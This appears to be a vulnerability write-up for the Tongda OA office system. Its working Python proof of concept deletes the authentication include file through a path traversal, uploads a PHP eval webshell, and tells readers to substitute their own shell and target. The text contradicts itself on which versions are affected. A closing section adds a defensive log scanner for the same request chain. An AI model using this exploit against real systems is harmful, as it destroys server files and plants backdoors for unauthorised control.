Vulnerability overview
Tongda OA is an office automation system widely used in China. Versions V11.X below V11.5 and the Tongda OA 2017 edition contain an arbitrary user login vulnerability: a remote, unauthenticated attacker can use it to log in to the system as any user, including the system administrator.
Affected versions
Tongda OA v11.6
Environment setup
Download link:
https://pan.baidu.com/s/1VqUUNUsgsssK1Mhq2r8HHQ
Extraction code: him4
One-click default installation
Port configuration
Server configuration
Then visit http://localhost/
Vulnerability reproduction
PoC
import sys
import requests

target = "http://localhost/"
payload = "<?php eval($_REQUEST['a']);?>"

print("[*]Warning,This exploit code will DELETE auth.inc.php which may damage the OA")
input("Press enter to continue")

# Step 1: the traversal in print.php's guid parameter deletes auth.inc.php.
print("[*]Deleting auth.inc.php....")
url = target + "/module/appbuilder/assets/print.php?guid=../../../webroot/inc/auth.inc.php"
requests.get(url=url)

# Step 2: verify the file is gone; the server answers "No input file specified." for a missing PHP file.
print("[*]Checking if file deleted...")
url = target + "/inc/auth.inc.php"
page = requests.get(url=url).text
if 'No input file specified.' not in page:
    print("[-]Failed to delete auth.inc.php")
    sys.exit(-1)
print("[+]Successfully deleted auth.inc.php!")

# Step 3: upload the payload; the traversal in repkid places it in the web root.
print("[*]Uploading payload...")
url = target + "/general/data_center/utils/upload.php?action=upload&filetype=nmsl&repkid=/.<>./.<>./.<>./"
files = {'FILE1': ('hack.php', payload)}
requests.post(url=url, files=files)

# Step 4: check whether the uploaded file is reachable.
url = target + "/_hack.php"
page = requests.get(url=url).text
if 'No input file specified.' not in page:
    print("[+]File Uploaded Successfully")
    print("[+]URL:", url)
else:
    print("[-]Failed to upload file")
Replace target in the exploit with the target URL.
Replace payload with your own webshell.
Then connect to it directly.
Remediation
Update to the latest version.
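Until the update is applied, the request sequence the PoC above sends is easy to spot in web-server access logs. The following Python scanner is an added example, not part of the original post: the log lines and client IPs are constructed, and the four rules are derived only from the paths and responses shown in the PoC (print.php traversal, auth.inc.php returning 404, the ".<>." repkid sequence on upload.php, and an underscore-prefixed PHP file requested from the web root).

```python
import re
from urllib.parse import unquote

# Constructed sample lines in Apache common log format (not real traffic).
# The first four mirror the PoC's request sequence; the last two are benign.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2021:10:00:01 +0800] "GET /module/appbuilder/assets/print.php?guid=../../../webroot/inc/auth.inc.php HTTP/1.1" 200 0
10.0.0.5 - - [01/Jan/2021:10:00:02 +0800] "GET /inc/auth.inc.php HTTP/1.1" 404 32
10.0.0.5 - - [01/Jan/2021:10:00:03 +0800] "POST /general/data_center/utils/upload.php?action=upload&filetype=nmsl&repkid=/.<>./.<>./.<>./ HTTP/1.1" 200 0
10.0.0.5 - - [01/Jan/2021:10:00:04 +0800] "GET /_hack.php?a=phpinfo(); HTTP/1.1" 200 512
10.0.0.7 - - [01/Jan/2021:10:00:05 +0800] "GET /general/index.php HTTP/1.1" 200 2048
10.0.0.7 - - [01/Jan/2021:10:00:06 +0800] "POST /general/data_center/utils/upload.php?action=upload&filetype=doc&repkid=12 HTTP/1.1" 200 0
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)


def classify(path, status):
    """Return the detection rule names matched by one request (path is URL-decoded first)."""
    p = unquote(path)
    hits = []
    # PoC step 1: print.php called with a traversal guid to delete auth.inc.php.
    if '/module/appbuilder/assets/print.php' in p and '..' in p:
        hits.append('print.php traversal (file deletion)')
    # The PoC's own success check: auth.inc.php is no longer served.
    if p.startswith('/inc/auth.inc.php') and status == '404':
        hits.append('auth.inc.php missing (404)')
    # PoC step 3: upload.php with the '.<>.' sequence in repkid to escape the upload directory.
    if '/general/data_center/utils/upload.php' in p and '.<>.' in p:
        hits.append('upload.php repkid traversal (webshell upload)')
    # PoC step 4: the uploaded file is served from the web root with a leading underscore.
    if re.match(r'^/_[^/?]+\.php', p):
        hits.append('underscore-prefixed PHP file in web root (uploaded shell)')
    return hits


def scan_log(text):
    """Return (client_ip, rule) pairs for every matching line; lines that do not parse are skipped."""
    alerts = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        for rule in classify(m['path'], m['status']):
            alerts.append((m['ip'], rule))
    return alerts
```

A single client tripping all four rules in order is the full chain; the 404 rule alone is also worth alerting on, since a missing auth.inc.php means authentication is already gone.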